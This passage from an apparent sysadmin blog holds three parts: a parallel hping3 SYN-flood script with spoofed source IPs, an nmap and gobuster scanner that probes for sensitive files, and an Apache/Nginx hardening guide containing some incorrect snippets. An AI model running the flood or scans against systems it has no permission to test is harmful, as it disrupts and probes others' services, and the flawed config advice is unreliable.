echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
exit 1
fi
# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"
# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))
# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
echo "Using randomized source IPs (--rand-source)"
# Use seq and xargs to parallelize the hping3 command with random source IPs
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
echo "Using actual source IP (no randomization)"
# Use seq and xargs to parallelize the hping3 command without source randomization
seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi
echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"
EOF
chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4
# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true
# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false
# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true
# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

Parameter 5: RANDOMIZE_SOURCE (OPTIONAL)

  • true: Use randomized source IPs (–rand-source flag)
    Makes packets appear from random IPs, harder to block
  • false: Use actual source IP (no randomization)
    Easier to trace and debug, simpler firewall rules
  • Default: true (if parameter not specified)

Important Considerations ⚠️

• Permissions: hping3 requires root or superuser privileges to craft and send raw packets. You’ll need to run this script with sudo.

• Legal and Ethical Use: This tool is for ethical and educational purposes only. Using this script to perform a SYN flood attack on a network or system you do not own or have explicit permission to test is illegal. Use it in a controlled lab environment.

Macbook: Useful/Basic NMAP script to check for vulnerabilities and create a formatted report

If you want to quickly health check your website, then the following script is a simple NMAP script that scans your site for common issues and formats the results in a nice report style.

#!/bin/bash
# Nmap Vulnerability Scanner with Severity Grouping, TLS checks, and Directory Discovery
# Usage: ./vunscan.sh <target_domain>
# Colors for output
RED='\033[0;31m'
ORANGE='\033[0;33m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color
# Check if target is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <target_domain>"
echo "Example: $0 example.com"
exit 1
fi
TARGET=$1
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="vuln_scan_${TARGET}_${TIMESTAMP}"
RAW_OUTPUT="${OUTPUT_DIR}/raw_scan.xml"
OPEN_PORTS=""
# Debug output
echo "DEBUG: TARGET=$TARGET"
echo "DEBUG: TIMESTAMP=$TIMESTAMP"
echo "DEBUG: OUTPUT_DIR=$OUTPUT_DIR"
echo "DEBUG: RAW_OUTPUT=$RAW_OUTPUT"
# Create output directory
mkdir -p "$OUTPUT_DIR"
if [ ! -d "$OUTPUT_DIR" ]; then
echo -e "${RED}Error: Failed to create output directory $OUTPUT_DIR${NC}"
exit 1
fi
echo "================================================================"
echo "         Vulnerability Scanner for $TARGET"
echo "================================================================"
echo "Scan started at: $(date)"
echo "Results will be saved in: $OUTPUT_DIR"
echo ""
# Function to print section headers
print_header() {
echo -e "\n${BLUE}================================================================${NC}"
echo -e "${BLUE}$1${NC}"
echo -e "${BLUE}================================================================${NC}"
}
# Function to run nmap scan
run_scan() {
print_header "Running Comprehensive Vulnerability Scan"
echo "This may take several minutes…"
# First, determine which ports are open
echo "Phase 1: Port discovery..."
echo "Scanning for open ports (this may take a while)..."
# Try a faster scan first on common ports
nmap -p 1-1000,8080,8443,3306,5432,27017 --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null
# If user wants full scan, uncomment the next line and comment the previous one
# nmap -p- --open -T4 "$TARGET" -oG "${OUTPUT_DIR}/open_ports.txt" 2>/dev/null
# Extract open ports
if [ -f "${OUTPUT_DIR}/open_ports_quick.txt" ]; then
OPEN_PORTS=$(grep -oE '[0-9]+/open' "${OUTPUT_DIR}/open_ports_quick.txt" 2>/dev/null | cut -d'/' -f1 | tr '\n' ',' | sed 's/,$//')
fi
# If no ports found, try common web ports
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports found in quick scan. Checking common web ports...${NC}"
# Test common ports individually
COMMON_PORTS="80,443,8080,8443,22,21,25,3306,5432"
OPEN_PORTS=""
for port in $(echo $COMMON_PORTS | tr ',' ' '); do
echo -n "Testing port $port... "
if nmap -p $port --open "$TARGET" 2>/dev/null | grep -q "open"; then
echo "open"
if [ -z "$OPEN_PORTS" ]; then
OPEN_PORTS="$port"
else
OPEN_PORTS="$OPEN_PORTS,$port"
fi
else
echo "closed/filtered"
fi
done
fi
# Final fallback
if [ -z "$OPEN_PORTS" ] || [ "$OPEN_PORTS" = "" ]; then
echo -e "${YELLOW}Warning: No open ports detected. Using default web ports for scanning.${NC}"
OPEN_PORTS="80,443"
fi
echo ""
echo "Ports to scan: $OPEN_PORTS"
echo ""
# Main vulnerability scan with http-vulners-regex
echo "Phase 2: Vulnerability scanning..."
nmap -sV -sC --script vuln,http-vulners-regex \
--script-args vulns.showall,http-vulners-regex.paths={/} \
-p "$OPEN_PORTS" \
-oX "$RAW_OUTPUT" \
-oN "${OUTPUT_DIR}/scan_normal.txt" \
"$TARGET"
if [ $? -ne 0 ]; then
echo -e "${RED}Error: Nmap scan failed${NC}"
# Don't exit, continue with other scans
fi
}
# Function to parse and categorize vulnerabilities
parse_vulnerabilities() {
print_header "Parsing and Categorizing Vulnerabilities"
# Initialize arrays
declare -a critical_vulns=()
declare -a high_vulns=()
declare -a medium_vulns=()
declare -a low_vulns=()
declare -a info_vulns=()
# Create temporary files for each severity
CRITICAL_FILE="${OUTPUT_DIR}/critical.tmp"
HIGH_FILE="${OUTPUT_DIR}/high.tmp"
MEDIUM_FILE="${OUTPUT_DIR}/medium.tmp"
LOW_FILE="${OUTPUT_DIR}/low.tmp"
INFO_FILE="${OUTPUT_DIR}/info.tmp"
# Clear temp files
> "$CRITICAL_FILE"
> "$HIGH_FILE"
> "$MEDIUM_FILE"
> "$LOW_FILE"
> "$INFO_FILE"
# Parse XML output for vulnerabilities
if [ -f "$RAW_OUTPUT" ]; then
# Extract script output and categorize by common vulnerability indicators
grep -A 20 '<script id=".*vuln.*"' "$RAW_OUTPUT" | while read line; do
if echo "$line" | grep -qi "CRITICAL\|CVE.*CRITICAL\|score.*9\|score.*10"; then
echo "$line" >> "$CRITICAL_FILE"
elif echo "$line" | grep -qi "HIGH\|CVE.*HIGH\|score.*[7-8]"; then
echo "$line" >> "$HIGH_FILE"
elif echo "$line" | grep -qi "MEDIUM\|CVE.*MEDIUM\|score.*[4-6]"; then
echo "$line" >> "$MEDIUM_FILE"
elif echo "$line" | grep -qi "LOW\|CVE.*LOW\|score.*[1-3]"; then
echo "$line" >> "$LOW_FILE"
elif echo "$line" | grep -qi "INFO\|INFORMATION"; then
echo "$line" >> "$INFO_FILE"
fi
done
# Also parse normal output for vulnerability information
if [ -f "${OUTPUT_DIR}/scan_normal.txt" ]; then
# Look for common vulnerability patterns in normal output
grep -E "(CVE-|VULNERABLE|State: VULNERABLE)" "${OUTPUT_DIR}/scan_normal.txt" | while read vuln_line; do
if echo "$vuln_line" | grep -qi "critical\|9\.[0-9]\|10\.0"; then
echo "$vuln_line" >> "$CRITICAL_FILE"
elif echo "$vuln_line" | grep -qi "high\|[7-8]\.[0-9]"; then
echo "$vuln_line" >> "$HIGH_FILE"
elif echo "$vuln_line" | grep -qi "medium\|[4-6]\.[0-9]"; then
echo "$vuln_line" >> "$MEDIUM_FILE"
elif echo "$vuln_line" | grep -qi "low\|[1-3]\.[0-9]"; then
echo "$vuln_line" >> "$LOW_FILE"
else
echo "$vuln_line" >> "$INFO_FILE"
fi
done
fi
fi
}
# Function to display vulnerabilities by severity
display_results() {
print_header "VULNERABILITY SCAN RESULTS"
# Critical Vulnerabilities
echo -e "\n${RED}🔴 CRITICAL SEVERITY VULNERABILITIES${NC}"
echo "=================================================="
if [ -s "${OUTPUT_DIR}/critical.tmp" ]; then
cat "${OUTPUT_DIR}/critical.tmp" | head -20
CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
echo -e "${RED}Total Critical: $CRITICAL_COUNT${NC}"
else
echo -e "${GREEN}✓ No critical vulnerabilities found${NC}"
fi
# High Vulnerabilities
echo -e "\n${ORANGE}🟠 HIGH SEVERITY VULNERABILITIES${NC}"
echo "============================================="
if [ -s "${OUTPUT_DIR}/high.tmp" ]; then
cat "${OUTPUT_DIR}/high.tmp" | head -15
HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
echo -e "${ORANGE}Total High: $HIGH_COUNT${NC}"
else
echo -e "${GREEN}✓ No high severity vulnerabilities found${NC}"
fi
# Medium Vulnerabilities
echo -e "\n${YELLOW}🟡 MEDIUM SEVERITY VULNERABILITIES${NC}"
echo "==============================================="
if [ -s "${OUTPUT_DIR}/medium.tmp" ]; then
cat "${OUTPUT_DIR}/medium.tmp" | head -10
MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
echo -e "${YELLOW}Total Medium: $MEDIUM_COUNT${NC}"
else
echo -e "${GREEN}✓ No medium severity vulnerabilities found${NC}"
fi
# Low Vulnerabilities
echo -e "\n${BLUE}🔵 LOW SEVERITY VULNERABILITIES${NC}"
echo "=========================================="
if [ -s "${OUTPUT_DIR}/low.tmp" ]; then
cat "${OUTPUT_DIR}/low.tmp" | head -8
LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
echo -e "${BLUE}Total Low: $LOW_COUNT${NC}"
else
echo -e "${GREEN}✓ No low severity vulnerabilities found${NC}"
fi
# Information/Other
echo -e "\n${GREEN}ℹ️  INFORMATIONAL${NC}"
echo "========================="
if [ -s "${OUTPUT_DIR}/info.tmp" ]; then
cat "${OUTPUT_DIR}/info.tmp" | head -5
INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo -e "${GREEN}Total Info: $INFO_COUNT${NC}"
else
echo "No informational items found"
fi
}
# Function to run gobuster scan for enhanced directory discovery
run_gobuster_scan() {
echo "Running gobuster directory scan..."
GOBUSTER_RESULTS="${OUTPUT_DIR}/gobuster_results.txt"
PERMISSION_ANALYSIS="${OUTPUT_DIR}/gobuster_permissions.txt"
> "$PERMISSION_ANALYSIS"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Scanning $PROTOCOL://$TARGET:$port with gobuster..."
# Run gobuster with common wordlist
if [ -f "/usr/share/wordlists/dirb/common.txt" ]; then
WORDLIST="/usr/share/wordlists/dirb/common.txt"
elif [ -f "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt" ]; then
WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
else
# Create a small built-in wordlist
WORDLIST="${OUTPUT_DIR}/temp_wordlist.txt"
cat > "$WORDLIST" <<EOF
admin
administrator
api
backup
bin
cgi-bin
config
data
database
db
debug
dev
development
doc
docs
documentation
download
downloads
error
errors
export
files
hidden
images
img
include
includes
js
library
log
logs
manage
management
manager
media
old
private
proc
public
resources
scripts
secret
secure
server-status
staging
static
storage
system
temp
templates
test
testing
tmp
upload
uploads
users
var
vendor
web
webapp
wp-admin
wp-content
.git
.svn
.env
.htaccess
.htpasswd
robots.txt
sitemap.xml
web.config
phpinfo.php
info.php
test.php
EOF
fi
# Run gobuster with status code analysis
gobuster dir -u "$PROTOCOL://$TARGET:$port" \
-w "$WORDLIST" \
-k \
-t 10 \
--no-error \
-o "${GOBUSTER_RESULTS}_${port}.txt" \
-s "200,204,301,302,307,401,403,405" 2>/dev/null
# Analyze results for permission issues
if [ -f "${GOBUSTER_RESULTS}_${port}.txt" ]; then
echo "Analyzing gobuster results for permission issues..."
# Check for 403 Forbidden directories
grep "Status: 403" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${ORANGE}[403 Forbidden]${NC} $PROTOCOL://$TARGET:$port$dir - Directory exists but access denied" >> "$PERMISSION_ANALYSIS"
echo -e "${ORANGE}  Permission Issue:${NC} $PROTOCOL://$TARGET:$port$dir (403 Forbidden)"
done
# Check for 401 Unauthorized directories
grep "Status: 401" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
echo -e "${YELLOW}[401 Unauthorized]${NC} $PROTOCOL://$TARGET:$port$dir - Authentication required" >> "$PERMISSION_ANALYSIS"
echo -e "${YELLOW}  Auth Required:${NC} $PROTOCOL://$TARGET:$port$dir (401 Unauthorized)"
done
# Check for directory listing enabled (potentially dangerous)
grep "Status: 200" "${GOBUSTER_RESULTS}_${port}.txt" | while read line; do
dir=$(echo "$line" | awk '{print $1}')
# Check if it's a directory by looking for trailing slash or common directory patterns
if [[ "$dir" =~ /$ ]] || [[ ! "$dir" =~ \. ]]; then
# Test if directory listing is enabled
RESPONSE=$(curl -k -s --max-time 5 "$PROTOCOL://$TARGET:$port$dir" 2>/dev/null)
if echo "$RESPONSE" | grep -qi "index of\|directory listing\|parent directory\|<pre>\|<dir>"; then
echo -e "${RED}[Directory Listing Enabled]${NC} $PROTOCOL://$TARGET:$port$dir - SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Directory Listing:${NC} $PROTOCOL://$TARGET:$port$dir"
fi
fi
done
# Check for sensitive files with incorrect permissions
for sensitive_file in ".git/config" ".env" ".htpasswd" "web.config" "phpinfo.php" "info.php" ".DS_Store" "Thumbs.db"; do
if grep -q "/$sensitive_file.*Status: 200" "${GOBUSTER_RESULTS}_${port}.txt"; then
echo -e "${RED}[Sensitive File Exposed]${NC} $PROTOCOL://$TARGET:$port/$sensitive_file - CRITICAL SECURITY RISK" >> "$PERMISSION_ANALYSIS"
echo -e "${RED}  🚨 Sensitive File:${NC} $PROTOCOL://$TARGET:$port/$sensitive_file"
fi
done
fi
done
# Clean up temporary wordlist if created
[ -f "${OUTPUT_DIR}/temp_wordlist.txt" ] && rm -f "${OUTPUT_DIR}/temp_wordlist.txt"
# Display permission analysis summary
if [ -s "$PERMISSION_ANALYSIS" ]; then
echo ""
echo -e "${ORANGE}=== Directory Permission Issues Summary ===${NC}"
cat "$PERMISSION_ANALYSIS"
# Count different types of issues
FORBIDDEN_COUNT=$(grep -c "403 Forbidden" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
UNAUTH_COUNT=$(grep -c "401 Unauthorized" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
LISTING_COUNT=$(grep -c "Directory Listing Enabled" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
SENSITIVE_COUNT=$(grep -c "Sensitive File Exposed" "$PERMISSION_ANALYSIS" 2>/dev/null || echo 0)
echo ""
echo "Permission Issue Statistics:"
echo "  - 403 Forbidden directories: $FORBIDDEN_COUNT"
echo "  - 401 Unauthorized directories: $UNAUTH_COUNT"
echo "  - Directory listings enabled: $LISTING_COUNT"
echo "  - Sensitive files exposed: $SENSITIVE_COUNT"
fi
}
# Function to run TLS/SSL checks
run_tls_checks() {
print_header "Running TLS/SSL Security Checks"
# Check for HTTPS ports
HTTPS_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '443|8443' | tr '\n' ',' | sed 's/,$//')
if [ -z "$HTTPS_PORTS" ]; then
HTTPS_PORTS="443"
echo "No HTTPS ports found in scan, checking default port 443..."
fi
echo "Checking TLS/SSL on ports: $HTTPS_PORTS"
# Run SSL scan using nmap ssl scripts
nmap -sV --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-ccs-injection,ssl-heartbleed,ssl-poodle,sslv2,tls-alpn,tls-nextprotoneg \
-p "$HTTPS_PORTS" \
-oN "${OUTPUT_DIR}/tls_scan.txt" \
"$TARGET" 2>/dev/null
# Parse TLS results
TLS_ISSUES_FILE="${OUTPUT_DIR}/tls_issues.txt"
> "$TLS_ISSUES_FILE"
# Check for weak ciphers
if grep -q "TLSv1.0\|SSLv2\|SSLv3" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
fi
# Check for weak cipher suites
if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
fi
# Check for certificate issues
if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
fi
# Display TLS results
echo ""
if [ -s "$TLS_ISSUES_FILE" ]; then
echo -e "${RED}TLS/SSL Issues Found:${NC}"
cat "$TLS_ISSUES_FILE"
else
echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
fi
echo ""
}
# Function to run directory busting and permission checks
run_dirbuster() {
print_header "Running Directory Discovery and Permission Checks"
# Check for web ports
WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
if [ -z "$WEB_PORTS" ]; then
echo "No standard web ports found in open ports, checking defaults..."
WEB_PORTS="80,443"
fi
echo "Running directory discovery on web ports: $WEB_PORTS"
# Check if gobuster is available
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
run_gobuster_scan
else
echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
fi
# Use nmap's http-enum script for directory discovery
nmap -sV --script http-enum \
--script-args http-enum.basepath='/' \
-p "$WEB_PORTS" \
-oN "${OUTPUT_DIR}/dirbuster.txt" \
"$TARGET" 2>/dev/null
# Common directory wordlist (built-in small list)
COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
# Quick check for common directories using curl
DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
> "$DIRS_FOUND_FILE"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Checking common directories on $PROTOCOL://$TARGET:$port"
for dir in $COMMON_DIRS; do
URL="$PROTOCOL://$TARGET:$port/$dir"
STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
# Check for permission issues
if [[ "$STATUS" == "403" ]]; then
echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
elif [[ "$STATUS" == "401" ]]; then
echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
fi
fi
done
done
# Display results
echo ""
if [ -s "$DIRS_FOUND_FILE" ]; then
echo -e "${YELLOW}Directories/Files discovered:${NC}"
cat "$DIRS_FOUND_FILE"
else
echo "No additional directories found"
fi
# Display permission issues if found
if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
echo ""
echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
cat "${OUTPUT_DIR}/permission_issues.txt"
fi
echo ""
}
# Function to generate summary report
generate_summary() {
print_header "SCAN SUMMARY"
CRITICAL_COUNT=0
HIGH_COUNT=0
MEDIUM_COUNT=0
LOW_COUNT=0
INFO_COUNT=0
[ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
[ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
[ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
[ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
[ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo "Target: $TARGET"
echo "Scan Date: $(date)"
echo ""
echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
echo ""
TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
echo "Total Vulnerabilities: $TOTAL"
# Risk assessment
if [ $CRITICAL_COUNT -gt 0 ]; then
echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
elif [ $HIGH_COUNT -gt 0 ]; then
echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
elif [ $MEDIUM_COUNT -gt 0 ]; then
echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
elif [ $LOW_COUNT -gt 0 ]; then
echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
else
echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
fi
# Save summary to file
{
echo "Vulnerability Scan Summary for $TARGET"
echo "======================================"
echo "Scan Date: $(date)"
echo ""
echo "Critical: $CRITICAL_COUNT"
echo "High: $HIGH_COUNT"
echo "Medium: $MEDIUM_COUNT"
echo "Low: $LOW_COUNT"
echo "Informational: $INFO_COUNT"
echo "Total: $TOTAL"
echo ""
echo "Additional Checks:"
[ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
[ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
[ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
} > "${OUTPUT_DIR}/summary.txt"
}
# Main execution
main() {
echo "Starting vulnerability scan for $TARGET…"
# Check if required tools are installed
if ! command -v nmap &> /dev/null; then
echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
exit 1
fi
if ! command -v curl &> /dev/null; then
echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
exit 1
fi
# Check for optional tools
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
else
echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
fi
# Run the main vulnerability scan
run_scan
# Run TLS/SSL checks
run_tls_checks
# Run directory discovery
run_dirbuster
# Parse results
parse_vulnerabilities
# Display formatted results
display_results
# Generate summary
generate_summary
# Cleanup temporary files
rm -f "${OUTPUT_DIR}"/*.tmp
print_header "SCAN COMPLETE"
echo "All results saved in: $OUTPUT_DIR"
echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
echo -e "${GREEN}Scan completed at: $(date)${NC}"
}
# Run main function
main

Here’s a comprehensive guide on how to fix each type of directory permission issue that the above script might find (for apache):

## 1. **403 Forbidden Errors**
### What it means:
The directory/file exists but the server is denying access to it.
### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory:
Order deny,allow
Deny from all
# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/
# For Nginx
# Add to nginx.conf:
location /admin {
deny all;
return 404;  # Return 404 instead of 403 to hide existence
}
## 2. **401 Unauthorized Errors**
### What it means:
Authentication is required but may not be properly configured.
### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username
# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username
# Add to nginx.conf:
location /admin {
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**
### What it means:
Anyone can see all files in the directory - major security risk!
### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes
# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
Options -Indexes
</Directory>
# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default
# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**
### Common exposed files and fixes:
#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git
# Or block access via .htaccess
<Files ~ "^\.git">
Order allow,deny
Deny from all
</Files>
# For Nginx:
location ~ /\.git {
deny all;
return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/
# Update your application to read from new location
# In PHP: require_once __DIR__ . '/../.env';
# Block via .htaccess
<Files .env>
Order allow,deny
Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/
# Or restrict access via .htaccess
<Files "config.php">
Order allow,deny
Deny from all
</Files>
#### **Backup files**
# Remove backup files from web directory
find /var/www/html -name "*.bak" -o -name "*.backup" -o -name "*.old" | xargs rm -f
# Create a cron job to clean regularly
echo "0 2 * * * find /var/www/html -name '*.bak' -o -name '*.backup' -delete" | crontab -
## 5. **General Security Best Practices**
### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes
# Deny access to hidden files and directories
<Files .*>
Order allow,deny
Deny from all
</Files>
# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
Order allow,deny
Deny from all
</FilesMatch>
# Protect sensitive files
location ~ /(\.htaccess|\.htpasswd|\.env|composer\.json|composer\.lock|package\.json|package-lock\.json)$ {
deny all;
return 404;
}
## 6. Quick Security Audit Commands
## Run these commands to find and fix common issues:
# Find all .git directories in web root
find /var/www/html -type d -name .git
# Find all .env files
find /var/www/html -name .env
# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;
# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
## 7. Testing Your Fixes
## After implementing fixes, test them:
# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404
# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list
# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved
## 8. Preventive Measures
## 1. Use a deployment script that excludes sensitive files:
bash
## 2. Regular security scans:
bash
## 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare
# Remember: The goal is not just to hide these files (security through obscurity) but to properly secure them or remove them from the web-accessible directory entirely.

MacOs: How to see which processes are using a specific port (eg 443)

Below is a useful script when you want to see which processes are using a specific port.

#!/bin/bash
# Port Monitor Script for macOS
# Usage: ./port_monitor.sh <port_number>
# Check if port number is provided
if [ $# -eq 0 ]; then
echo "Usage: $0 <port_number>"
